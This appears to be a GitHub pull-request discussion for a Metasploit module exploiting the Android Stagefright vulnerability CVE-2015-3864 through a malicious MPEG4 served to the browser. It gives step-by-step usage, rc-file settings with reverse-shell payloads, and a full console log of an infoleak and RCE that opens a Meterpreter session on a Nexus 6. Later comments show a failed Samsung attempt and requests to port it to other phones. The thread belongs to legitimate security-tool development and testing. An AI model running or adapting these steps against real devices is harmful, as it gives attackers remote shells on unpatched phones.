Stagefright CVE-2015-3864 release

[jduck]

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/android/browser/stagefright_mp4_tx3g_64bit
• Visit the exploit web server with a vulnerable device
• Verify you receive a shell

An MSF rc file:

The Nexus targets require mettle:

set PAYLOAD linux/armle/mettle/reverse_tcp
set URIPATH /stagefright
exploit -j

The Samsung target works without mettle:

set PAYLOAD linux/armle/shell_reverse_tcp
set URIPATH /stagefright
exploit -j

[timwr]

This is awesome, works great on a Nexus 6 with LMY47M

[*] Processing stagefright.rc for ERB directives.
resource (stagefright.rc)> use exploit/android/browser/stagefright_mp4_tx3g_64bit
resource (stagefright.rc)> set payload linux/armle/mettle/reverse_tcp
payload => linux/armle/mettle/reverse_tcp
resource (stagefright.rc)> set SRVHOST 192.168.43.203
SRVHOST => 192.168.43.203
resource (stagefright.rc)> set LHOST 192.168.43.203
LHOST => 192.168.43.203
resource (stagefright.rc)> set URIPATH /stagefright
URIPATH => /stagefright
resource (stagefright.rc)> exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.43.203:4444 
msf exploit(stagefright_mp4_tx3g_64bit) > [*] Using URL: http://192.168.43.203:8080/stagefright
[*] Server started.

msf exploit(stagefright_mp4_tx3g_64bit) > adb shell am start -a android.intent.action.VIEW -d http://192.168.43.203:8080/stagefright
[*] exec: adb shell am start -a android.intent.action.VIEW -d http://192.168.43.203:8080/stagefright

Starting: Intent { act=android.intent.action.VIEW dat=http://192.168.43.203:8080/stagefright }
msf exploit(stagefright_mp4_tx3g_64bit) > 
[*] Sending HTML to 192.168.43.133:38670...
[*] Sending infoleak gzip'd MPEG4 (742 bytes) to 192.168.43.133:38670... (heap: 0x0, code: 0x0 from Browser)
[*] Sending infoleak gzip'd MPEG4 (740 bytes) to 192.168.43.133:38670... (heap: 0xb4043080, code: 0x0 from Browser)
[*] Sending RCE gzip'd MPEG4 (102045 bytes) to 192.168.43.133:38670... (heap: 0xb4043080, code: 0xb6714e98 from Browser)
[*] Sending RCE gzip'd MPEG4 (102046 bytes) to 192.168.43.133:37802... (heap: 0xb4043080, code: 0xb6714e98 from SF)
[*] Sending stage (374540 bytes) to 192.168.43.133
[*] Meterpreter session 1 opened (192.168.43.203:4444 -> 192.168.43.133:40847) at 2016-09-24 08:38:12 +0100

msf exploit(stagefright_mp4_tx3g_64bit) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : localhost.localdomain
OS           :  (Linux 3.10.40-geec2459)
Architecture : armv7l
Meterpreter  : armle/linux
meterpreter > getuid 
Server username: uid=1013, gid=1013, euid=1005, egid=1005

[busterb]

Woo hoo, thanks a lot @jduck & @acammack-r7.

[SymbianSyMoh]

Wow, That's great 👍

[tdoan-r7]

@acammack-r7 can you add release notes to this ticket?

[wchen-r7]

Release Notes

This module exploits an integer overflow vulnerability in the Stagefright library. The vulnerability can be abused in multiple ways, but this particular exploit is designed to work within an HTML5 compatible browser.

[SymbianSyMoh]

I tried but no luck!

msf exploit(stagefright_mp4_tx3g_64bit) > set PAYLOAD linux/armle/shell_reverse_tcp
PAYLOAD => linux/armle/shell_reverse_tcp

msf exploit(stagefright_mp4_tx3g_64bit) > show options
Module options (exploit/android/browser/stagefright_mp4_tx3g_64bit):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  172.18.10.44     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH  /samsung           no        The URI to use for this exploit (default is random)


Payload options (linux/armle/shell_reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   ARGV0  sh               no        argv[0] to pass to execve
   LHOST  172.18.10.44     yes       The listen address
   LPORT  4449             yes       The listen port
   SHELL  /system/bin/sh   yes       The shell to execute.


Exploit target:
   Id  Name
   --  ----
   0   Automatic


msf exploit(stagefright_mp4_tx3g_64bit) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.18.10.44:4449 
[*] Using URL: http://172.18.10.44:8080/samsung
[*] Server started.
msf exploit(stagefright_mp4_tx3g_64bit) > 
[-] 172.18.10.44:39128 - Requested /samsung - Unknown user-agent: "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"

[-] 172.18.10.58:56455 - Requested /samsung - Unknown user-agent: "Mozilla/5.0 (Linux; Android 4.4.4; Samsung Galaxy Note 3 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36"

[-] 172.18.10.58:56578 - Requested /samsung - Unknown user-agent: "Mozilla/5.0 (Linux; Android 4.4.4; Samsung Galaxy Note 3 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36"

[-] 172.18.10.58:56818 - Requested /samsung - Unknown user-agent: "Mozilla/5.0 (Linux; Android 4.4.4; Samsung Galaxy Note 3 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36"

[jduck]

@SymbianSyMoh This isn't the correct forum for bug reports or feature requests. Feel free to create a new issue to describe your problem. In this case it should be something like "Feature: Please support exploiting the Samsung Galaxy Note 3 with KTU84P". Be sure to include the User-agent string in the issue body =)

[nitob]

Which emulator use?
I have, Android SDK, stagefright_mp4_tx3g_64bit - 10.15.0.6:57686 - Requested /6 - Unknown user-agent: "Mozilla/5.0

[jduck]

Emulators are not supported.

[nitob]

It is not supported?
_https://www.youtube.com/watch?v=dAZ4W6OkkRk

[jduck]

That's not an emulator. That is a live device being recorded with a screen recording program.

[sathish09]

How to modify it to work with oneplus one.. how to find the correct memory address of oneplus one to make it work

[wvu]

This is the wrong place for support questions.